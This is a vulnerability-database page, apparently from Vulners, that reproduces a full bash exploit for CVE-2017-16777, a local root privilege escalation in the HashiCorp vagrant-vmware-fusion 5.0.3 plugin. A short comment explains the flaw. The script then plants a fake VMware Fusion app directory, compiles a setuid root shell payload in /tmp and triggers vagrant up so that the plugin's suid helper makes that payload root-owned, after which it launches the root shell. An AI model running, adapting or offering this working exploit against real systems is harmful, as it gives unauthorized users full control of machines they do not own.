Vulners
Lucene search
Hashicorp vagrant-vmware-fusion 5.0.3 - Local root Privilege Escalation Exploit
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2017-16777 | 6 Dec 201700:00 | – | circl |
 | HashiCorp Vagrant VMware Fusion Plugin Local Elevation of Privilege Vulnerability | 21 Nov 201700:00 | – | cnvd |
 | CVE-2017-16777 | 16 Nov 201715:00 | – | cve |
 | CVE-2017-16777 | 16 Nov 201715:00 | – | cvelist |
 | EUVD-2017-7956 | 7 Oct 202500:30 | – | euvd |
 | CVE-2017-16777 | 16 Nov 201715:29 | – | nvd |
 | CVE-2017-16777 | 16 Nov 201715:29 | – | osv |
 | Hashicorp vagrant-vmware-fusion 5.0.3 Local Privilege Escalation | 6 Dec 201700:00 | – | packetstorm |
 | Design/Logic Flaw | 16 Nov 201715:29 | – | prion |
# Another day, another root privesc bug in this plugin. Not quite so serious this
# time - this one is only exploitable if the user has the plugin installed but
# VMware Fusion *not* installed. This is a fairly unlikely scenario but it's a
# straight to root privesc with no user interaction so isn't the kind of thing
# that should be shipping with any software.
# This occurs because the suid root sudo helper that I have discussed in previous
# exploit writeups executes /Applications/VMware
# Fusion.app/Contents/Library/vmnet-cli
# as root, but if the application isn't installed and we're a local admin user we
# can create a fake app directory with a payload in place of vmnet-cli that gets
# executed as root.
# HashiCorp fixed this (very quickly) in 5.0.4.
# https://m4.rkw.io/vagrant_vmware_privesc_5.0.3.sh.txt
# 3c11083386b3f7352d60b327190eed4364383c0622351db5410d809f4bda746a
# ------------------------------------------------------------------------------
#!/bin/bash
echo
echo "#########################################################"
echo "# vagrant_vmware_fusion plugin 5.0.3 local root privesc #"
echo "# by m4rkw - https://m4.rkw.io/blog.html #";
echo "#########################################################"
echo "# Note: only works when VMWare Fusion is not installed. #"
echo "#########################################################"
echo
cleanup() {
exec 2> /dev/null
killall -9 vagrant 1>/dev/null 2>/dev/null
kill -9 `ps auxwww |egrep '\/vagrant up$' |xargs -L1 |cut -d ' ' -f2` &>/dev/null
exec 2> /dev/tty
cd
rm -rf .vagrant_vmware_fusion_503_exp
rm -rf /Applications/VMware\ Fusion.app
}
if [ -e "/Applications/VMware Fusion.app" ] ; then
echo "Fusion is installed, not exploitable."
exit 1
fi
echo "setting up fake app directory..."
mkdir /Applications/VMware\ Fusion.app
if [ ! $? -eq 0 ] ; then
echo "Failed to create /Applications/VMware Fusion.app."
exit 1
fi
mkdir -p /Applications/VMware\ Fusion.app/Contents/Library/services
touch /Applications/VMware\ Fusion.app/Contents/Library/vmrun
touch /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmrun
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services
cat > /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx <<EOF
#!/bin/bash
echo 1>&2
echo "VMware Fusion Information:" 1>&2
echo "VMware Fusion 10.0.1 build-6754183 Release" 1>&2
echo
EOF
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx
cat > /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli <<EOF
#!/bin/bash
chown root:wheel /tmp/vvp_503
chmod 4755 /tmp/vvp_503
EOF
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli
echo "compiling payload..."
cat > /tmp/vvp_503.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f /tmp/vvp_503; /bin/bash",NULL);
return 0;
}
EOF
gcc -o /tmp/vvp_503 /tmp/vvp_503.c
rm -f /tmp/vvp_503.c
cd
mkdir .vagrant_vmware_fusion_503_exp
cd .vagrant_vmware_fusion_503_exp
echo "writing dummy vagrantfile ..."
cat > vagrantfile <<EOF
Vagrant.configure('2') do |config|
config.vm.box = 'envimation/ubuntu-xenial'
end
EOF
echo "triggering vagrant up [stage 1]..."
vagrant up &>/dev/null &
while :
do
r=`ps auxwww |grep 'vagrant up' |grep -v grep`
if [ "$r" == "" ] ; then
break
fi
sleep 0.5
done
echo "dropping dummy machine..."
uuid=`ls -1 .vagrant/machines/default/vmware_fusion |grep -v vagrant_cwd`
touch .vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx
echo -n "`pwd`/.vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx" > .vagrant/machines/default/vmware_fusion/id
echo "triggering vagrant up [stage 2]..."
vagrant up &>/dev/null &
echo "waiting for payload to trigger ..."
count=0
success=0
while :
do
r=`ls -la /tmp/vvp_503 |grep -- '-rwsr-xr-x 1 root wheel'`
if [ "$r" != "" ] ; then
success=1
break
fi
r=`ps auxwww |grep 'vagrant up' |grep -v grep`
if [ "$r" == "" ] ; then
break
fi
sleep 0.2
count=$(($count + 1))
if [ $count -eq 250 ] ; then
echo "Timed out waiting for the payload to trigger."
cleanup
exit 1
fi
done
cleanup
if [ ! $success -eq 1 ] ; then
echo "exploit failed."
exit 1
fi
echo
cd
/tmp/vvp_503
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Dec 2017 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.00089